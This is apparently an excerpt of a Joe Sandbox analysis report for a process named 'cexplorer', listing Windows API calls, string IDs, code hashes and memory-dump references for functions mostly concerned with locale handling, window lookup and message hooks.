                                                                                                            Similarity
                                                                                                            • API ID: Version
                                                                                                            • String ID:
                                                                                                            • API String ID: 1889659487-0
                                                                                                            • Opcode ID: 00ea3530eb76a56b5878df0d2f93cd9045d140bdb75e66650f77ae501a3fbdc1
                                                                                                            • Instruction ID: 8ef6f9df6de6cd2769d754916a2d34b7974e70e8ef875d5e635e920fd55f7980
                                                                                                            • Opcode Fuzzy Hash: 00ea3530eb76a56b5878df0d2f93cd9045d140bdb75e66650f77ae501a3fbdc1
                                                                                                            • Instruction Fuzzy Hash: 6FF0E574C0430CCFCFA4EA64ED025E8B7B8B74D314F0006D6C954D2264E630078ADBA2
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0356AA4A,?,00000001,00000000,0356AC59), ref: 0356A95B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: c119fb1773f73cd282a7f1f20534bdb2899b2ac937c059aa3e62d75af140a6f5
                                                                                                            • Instruction ID: 7d59c4f0221a43453f25fb7c6c983c80db917d1b7b0851014908385388029646
                                                                                                            • Opcode Fuzzy Hash: c119fb1773f73cd282a7f1f20534bdb2899b2ac937c059aa3e62d75af140a6f5
                                                                                                            • Instruction Fuzzy Hash: 4DD05EA630932026E210915B7D44D7766ECDFC5BA1F154436BA88DB111D210CC458270
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93129b054b965bd74cf9fdec08082a9cbe0b53470be4beaa0daf4c7ad3108a03
                                                                                                            • Instruction ID: a4f9bc67704c954a19e489fba26a8d109a582f56c9e1a09fc043cefd8c699452
                                                                                                            • Opcode Fuzzy Hash: 93129b054b965bd74cf9fdec08082a9cbe0b53470be4beaa0daf4c7ad3108a03
                                                                                                            • Instruction Fuzzy Hash: CC02D032900635CFDB92CF6DC484109B7B6FF8A72432A82D5D858AB629D270BE51DFD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ae0e43f82692c6785844f3e70bb209c8b319b1924ab6e756aa91dc1deac9637f
                                                                                                            • Instruction ID: 19591b50ac9f78c43ddcaa5f9134b0ebc2a24eacea51600c71fdede77b761931
                                                                                                            • Opcode Fuzzy Hash: ae0e43f82692c6785844f3e70bb209c8b319b1924ab6e756aa91dc1deac9637f
                                                                                                            • Instruction Fuzzy Hash: 88D012AA26214296F72BC06E78F0B638547F741364F29CC2BBC03D6EE0E565EC9081A0
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0356EFB1
                                                                                                              • Part of subcall function 0356EF7C: GetProcAddress.KERNEL32(00000000), ref: 0356EF95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                            • Opcode ID: 4368d0d85f20e5eb244e5d2a3552cec86ca7a04c84a7a898b577580e90640e5d
                                                                                                            • Instruction ID: c4f31df06f30d00c92238c1ebc663fde0bd12b06660729db3a9b2be153eeab7e
                                                                                                            • Opcode Fuzzy Hash: 4368d0d85f20e5eb244e5d2a3552cec86ca7a04c84a7a898b577580e90640e5d
                                                                                                            • Instruction Fuzzy Hash: 4E41BB6DB1A30D5F5604EB6DBA02827B7E9F68D650360411AF405CF778DF30BC469A29
                                                                                                            APIs
                                                                                                              • Part of subcall function 035E735C: GetVersionExW.KERNEL32(?), ref: 035E737F
                                                                                                            • FindWindowExW.USER32(?,00000000,DUIViewWndClassName,00000000), ref: 035E78AF
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 035E78BE
                                                                                                            • FindWindowExW.USER32(?,00000000,ShellDll_DefView,00000000), ref: 035E78E0
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 035E78F8
                                                                                                            • FindWindowExW.USER32(?,00000000,ComboBoxEx32,00000000), ref: 035E7915
                                                                                                            • FindWindowExW.USER32(?,00000000,ComboBox,00000000), ref: 035E793A
                                                                                                            • FindWindowExW.USER32(?,00000000,Edit,00000000), ref: 035E7950
Strings
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: Window$Find$Long$Version
• String ID: #32770$ComboBox$ComboBoxEx32$DUIViewWndClassName$Edit$ShellDll_DefView
• API String ID: 1586926634-2731451753
• Opcode ID: 44cdc4ccd8fb5b2352253b519e847c812fee90d08408f59e282ea4311de2a19a
• Instruction ID: 1668659371e5b5964dc5b6ba7f9ecc200277436cc603ec5604cd0d3bfa7ecdce
• Opcode Fuzzy Hash: 44cdc4ccd8fb5b2352253b519e847c812fee90d08408f59e282ea4311de2a19a
• Instruction Fuzzy Hash: F0314134B4434AAADF14E7A8BC55F9EBBB8BF4D700F1404D1BA50EB5E1D670A600C764
APIs
• IsValidLocale.KERNEL32(?,00000001,00000000,0356AC59,?,?,?,?,00000000,00000000), ref: 0356A99B
• GetThreadLocale.KERNEL32(?,00000001,00000000,0356AC59,?,?,?,?,00000000,00000000), ref: 0356A9A4
  • Part of subcall function 0356A948: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0356AA4A,?,00000001,00000000,0356AC59), ref: 0356A95B
  • Part of subcall function 0356A8FC: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0356A91A
Similarity
• API ID: Locale$Info$ThreadValid
• String ID: AMPM$2$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 233154393-3379564615
• Opcode ID: 291a53f4f966d9f15809cfb96e38dfd936485c98b41e648614ced983fbf06155
• Instruction ID: 7041f970a0de3cbb71de477bf54e3c83d2c1c08c2169024cbd48699d2d7502ca
• Opcode Fuzzy Hash: 291a53f4f966d9f15809cfb96e38dfd936485c98b41e648614ced983fbf06155
• Instruction Fuzzy Hash: 767155B470024A9BDB01EB68E850A9E77BAFFC8340F518065E904BF376DB35DE068755
APIs
  • Part of subcall function 035560C0: GetTickCount.KERNEL32 ref: 035560F7
  • Part of subcall function 035560C0: GetTickCount.KERNEL32 ref: 0355610F
  • Part of subcall function 0356A8FC: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0356A91A
• GetThreadLocale.KERNEL32(00000000,00000004), ref: 0356B140
• EnumCalendarInfoW.KERNEL32(0356AF6C,00000000,00000000,00000004), ref: 0356B14B
• GetThreadLocale.KERNEL32(00000000,00000003,0356AF6C,00000000,00000000,00000004), ref: 0356B186
• EnumCalendarInfoW.KERNEL32(0356B010,00000000,00000000,00000003,0356AF6C,00000000,00000000,00000004), ref: 0356B191
• GetThreadLocale.KERNEL32(00000000,00000004), ref: 0356B222
• EnumCalendarInfoW.KERNEL32(0356AF6C,00000000,00000000,00000004), ref: 0356B22D
• GetThreadLocale.KERNEL32(00000000,00000003,0356AF6C,00000000,00000000,00000004), ref: 0356B26A
• EnumCalendarInfoW.KERNEL32(0356B010,00000000,00000000,00000003,0356AF6C,00000000,00000000,00000004), ref: 0356B275
Similarity
• API ID: InfoLocale$CalendarEnumThread$CountTick
• String ID: B.C.
• API String ID: 1601775584-621294921
• Opcode ID: 92825c1a42059d10adee7b42bf9a1b634658ea581fbf1187c1b2e82ae19f5c3f
• Instruction ID: dd7288a276b00097b361e3d4d456c597b5b467c6f0017678365d22f9650a00fd
• Opcode Fuzzy Hash: 92825c1a42059d10adee7b42bf9a1b634658ea581fbf1187c1b2e82ae19f5c3f
• Instruction Fuzzy Hash: 5B61ADB8A003069FD710EF69E890E6E77B5FF88310B114266E911EB375E730E946DB90
APIs
• EnterCriticalSection.KERNEL32(035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F,?,?,00000000,00000000,00000000), ref: 03559E12
• LeaveCriticalSection.KERNEL32(035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F,?,?,00000000,00000000), ref: 03559E36
• LeaveCriticalSection.KERNEL32(035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F,?,?,00000000,00000000), ref: 03559E45
• IsValidLocale.KERNEL32(00000000,00000002,035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F), ref: 03559E57
• EnterCriticalSection.KERNEL32(035F6B8C,00000000,00000002,035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F), ref: 03559EB4
• LeaveCriticalSection.KERNEL32(035F6B8C,035F6B8C,00000000,00000002,035F6B8C,035F6B8C,00000000,03559EF8,?,?,?,00000000,?,0355A7C0,00000000,0355A81F), ref: 03559EDD
Similarity
• API ID: CriticalSection$Leave$Enter$LocaleValid
• String ID: en-GB,en,en-US,
• API String ID: 975949045-3021119265
• Opcode ID: 6661b9bb33378dbbdbb3f442e5849289dcf8917f45a699f938c2bfd19b0be36d
• Instruction ID: c5fa827dd2e9f79b8a9ee9e5fcf9aabf8a71676539d794b6fb7c27e22622c078
• Opcode Fuzzy Hash: 6661b9bb33378dbbdbb3f442e5849289dcf8917f45a699f938c2bfd19b0be36d
• Instruction Fuzzy Hash: F0219D2C3407429FDB10F7B8B831A1E62B5BFC9B40B944427BD44CF271DB69BD018262
APIs
• GetParent.USER32(?), ref: 035E75B3
• GetParent.USER32(00000000), ref: 035E75B9
• GetClassNameW.USER32(?,?,0000002A), ref: 035E75D5
• GetForegroundWindow.USER32(?,?,0000002A,00000000,00000000,035E7688), ref: 035E7602
• GetClassNameW.USER32(?,?,0000002A), ref: 035E761A
Similarity
• API ID: ClassNameParent$ForegroundWindow
• String ID: Progman$WorkerA$WorkerW
• API String ID: 2969989632-172977758
• Opcode ID: bc828ab376a82044c8616c49b68498ff01834bcd8972e51dac2d814bf57dfce5
• Instruction ID: fb81a3a6afcce880bc2cad6db2650a48d4e4b553a164068b6e6bdd0137c9ce5b
• Opcode Fuzzy Hash: bc828ab376a82044c8616c49b68498ff01834bcd8972e51dac2d814bf57dfce5
• Instruction Fuzzy Hash: 01315174E0430E9FCF04EBE8E955A9DBBF5BF8C308F504496A804A7270E730AA418B95
APIs
• RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0355B34C
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: caa7075bec9111f3ab53f2e7a2690d8c0dcebeab829bd882439c2f69c70af4e8
• Instruction ID: ae448d75a3318a29ff4181ed7a23a29ed63851a405a7ebb24a9408d6172ddbf0
• Opcode Fuzzy Hash: caa7075bec9111f3ab53f2e7a2690d8c0dcebeab829bd882439c2f69c70af4e8
• Instruction Fuzzy Hash: 4FA14075900309DFDB24DFA8E8D8BAEB7B5FB48310F14811AF915AB2A4DB70B945CB50
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 035710FD
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 03571119
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 03571152
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 035711CF
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 035711E8
• VariantCopy.OLEAUT32(?), ref: 0357121D
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-3916222277
• Opcode ID: 808b75b1382cb8382c760c7c9109327d151ab10801d19e8297b759494dcee33f
• Instruction ID: bd3a53fec037b79385175a81be811ccbf857e20feb5216560716a71198ad55a7
• Opcode Fuzzy Hash: 808b75b1382cb8382c760c7c9109327d151ab10801d19e8297b759494dcee33f
• Instruction Fuzzy Hash: 63510A7990162A9BCB26DB58ED80BD9B3FCBF48200F0441D5E509EB261D670AF858F61
APIs
• Sleep.KERNEL32(00000000,?,?,00000000,03553AC8), ref: 03553EEE
• Sleep.KERNEL32(0000000A,00000000,?,?,00000000,03553AC8), ref: 03553F08
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: fe9955054f2ce1dd3d3ea7c1a892a7cbfa4cff1825cf0652b894cedda1b0bf9a
                                                                                                            • Instruction ID: 5759b5efd84f995859e52f7327ba1a9ad683225ea8d99c65330e7a08570074f8
                                                                                                            • Opcode Fuzzy Hash: fe9955054f2ce1dd3d3ea7c1a892a7cbfa4cff1825cf0652b894cedda1b0bf9a
                                                                                                            • Instruction Fuzzy Hash: 1971F0796042008FD715DF69E8A4B16BBE4BF85390F1886ABFC8CCB3A5D770A845CB51
                                                                                                            APIs
                                                                                                              • Part of subcall function 0356B788: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0356B934), ref: 0356B7BB
                                                                                                              • Part of subcall function 0356B788: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0356B7DF
                                                                                                              • Part of subcall function 0356B788: GetModuleFileNameW.KERNEL32(MZP,?,00000105), ref: 0356B7FA
                                                                                                              • Part of subcall function 0356B788: LoadStringW.USER32(00000000,0000FFE9,?,00000100), ref: 0356B895
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0356BAA5), ref: 0356B9E1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0356BA14
                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0356BA26
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0356BA2C
                                                                                                            • GetStdHandle.KERNEL32(000000F4,0356BAC0,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0356BA40
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,0356BAC0,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0356BA46
                                                                                                            • LoadStringW.USER32(00000000,0000FFEA,?,00000040), ref: 0356BA6A
                                                                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0356BA84
                                                                                                            Similarity
                                                                                                            • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 135118572-0
                                                                                                            • Opcode ID: 0c163e71526a4ac2213a51cda498ad2e8d7d6facedc347134692ae21129f32b3
                                                                                                            • Instruction ID: 85810bb46208734aba569ebe3e6a944376d63a9de4309317f7415ef2bd5a621b
                                                                                                            • Opcode Fuzzy Hash: 0c163e71526a4ac2213a51cda498ad2e8d7d6facedc347134692ae21129f32b3
                                                                                                            • Instruction Fuzzy Hash: C03123B5640309BFEB14EAA4EC52F9A77BCFB44700F5041A2BA04EB1E0DE707E448B65
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ac547d940d7c60dac1916f9a8e1d13404739ceccc6f5fed875c488b4a1598c67
                                                                                                            • Instruction ID: 2d3d3e949cf3a6fbe58225106593c5e60222d8fc7a9033314008085faa4758aa
                                                                                                            • Opcode Fuzzy Hash: ac547d940d7c60dac1916f9a8e1d13404739ceccc6f5fed875c488b4a1598c67
                                                                                                            • Instruction Fuzzy Hash: 16C1F2AA7003014BD715DA7EECA476EB296BBC4251F1C863BF918CB3B5DA64E8858340
                                                                                                            APIs
                                                                                                              • Part of subcall function 03556508: GetCurrentThreadId.KERNEL32 ref: 0355650B
                                                                                                            • GetTickCount.KERNEL32 ref: 035560F7
                                                                                                            • GetTickCount.KERNEL32 ref: 0355610F
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0355613F
                                                                                                            • GetTickCount.KERNEL32 ref: 0355616A
                                                                                                            • GetTickCount.KERNEL32 ref: 035561A1
                                                                                                            • GetTickCount.KERNEL32 ref: 035561CB
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0355623B
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3968769311-0
                                                                                                            • Opcode ID: 7bc76fd7dda9e4c100975d2f9becf246de18478248cf54b276f97c70d4424e80
                                                                                                            • Instruction ID: 68410931949f6e78dfe1ce8411861a4ec8f5fc7bd614ceb0359cfeb69eed6a66
                                                                                                            • Opcode Fuzzy Hash: 7bc76fd7dda9e4c100975d2f9becf246de18478248cf54b276f97c70d4424e80
                                                                                                            • Instruction Fuzzy Hash: F541A1352083C19ED721EE7CE49432EBBD1BF84254F89992EFCD887261EA74E4848712
                                                                                                            APIs
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 035E8DA4
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 035E8DAB
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            • ERROR SetDialogPath: SHParseDisplayName fail: , xrefs: 035E8E22
                                                                                                            • ERROR SetDialogPath: BrowseObject fail: , xrefs: 035E8E78
                                                                                                            • ERROR SetDialogPath: different thread, xrefs: 035E8DB4
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobalThread$CurrentDeleteMessagePostProcessWindow
                                                                                                            • String ID: ERROR SetDialogPath: BrowseObject fail: $ERROR SetDialogPath: SHParseDisplayName fail: $ERROR SetDialogPath: different thread
                                                                                                            • API String ID: 1848064026-4250285729
                                                                                                            • Opcode ID: 245945cfa2ada6906eef8d0b5eec207cafa26e4386f858892c69885e3ba18a56
                                                                                                            • Instruction ID: edde285988ab7f78c5a3b324ce291183af3c4e39dc4a22ebf1e631c4fa594c39
                                                                                                            • Opcode Fuzzy Hash: 245945cfa2ada6906eef8d0b5eec207cafa26e4386f858892c69885e3ba18a56
                                                                                                            • Instruction Fuzzy Hash: 19417575A083099FDB08DFA4F951AAEBBF8FB88710F214476F400E76A0D7316944CB65
                                                                                                            APIs
                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 035E7EEC
                                                                                                            • GetLastError.KERNEL32(00000000,035E805E), ref: 035E7FE1
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            • ERROR GetPathFromPIDL: SHCreateItemFromIDList fail: , xrefs: 035E7F59
                                                                                                            • ERROR GetPathFromPIDL: SHGetPathFromIDList fail: , xrefs: 035E8006
                                                                                                            • error, xrefs: 035E7EFC
                                                                                                            • ERROR GetPathFromPIDL: GetDisplayName fail: , xrefs: 035E7FB2
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$DeleteErrorFromLastListMessagePathPost
                                                                                                            • String ID: ERROR GetPathFromPIDL: GetDisplayName fail: $ERROR GetPathFromPIDL: SHCreateItemFromIDList fail: $ERROR GetPathFromPIDL: SHGetPathFromIDList fail: $error
                                                                                                            • API String ID: 1891711059-4188884885
                                                                                                            • Opcode ID: c4deb995a0ace60670ad429dbeeaf3545249541a7d6867956f0f0ebdefee8b1b
                                                                                                            • Instruction ID: 02f2198170d568dcadffc681d8d769c162aea3a7124b1abf94180010341cb1a1
                                                                                                            • Opcode Fuzzy Hash: c4deb995a0ace60670ad429dbeeaf3545249541a7d6867956f0f0ebdefee8b1b
                                                                                                            • Instruction Fuzzy Hash: 72412034A0534A9BCB58EBA4E854A9EB7B5FF88300F1041E5E814A7360DB34AF45CF51
APIs
• SetWindowsHookExW.USER32(00000007,035E9790,MZP,00000000), ref: 035E9927
• SetWindowsHookExW.USER32(00000005,035E988C,MZP,00000000), ref: 035E9951
• TranslateMessage.USER32(?), ref: 035E9967
• DispatchMessageW.USER32(?), ref: 035E9970
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 035E997F
Strings
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: Message$HookWindows$DispatchTranslate
• String ID: MZP
• API String ID: 3988588355-2889622443
• Opcode ID: ab9da512e1ac6d9a810c0a669f811217fc2370923b3db6bd961e359cab8b7cf3
• Instruction ID: 4cb17ecc36481fc719318e5760321ec31189bb0f50d9dc90d2d1e5c0eefc37e2
• Opcode Fuzzy Hash: ab9da512e1ac6d9a810c0a669f811217fc2370923b3db6bd961e359cab8b7cf3
• Instruction Fuzzy Hash: E4115E74A40309AFEB44EBA8EC85FAA73F8FB49700F044055F904DB2A4D774E845DBA1
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,035571A8,?,?,?,?,035572CE,035550B3,035550FA,?,?), ref: 0355712D
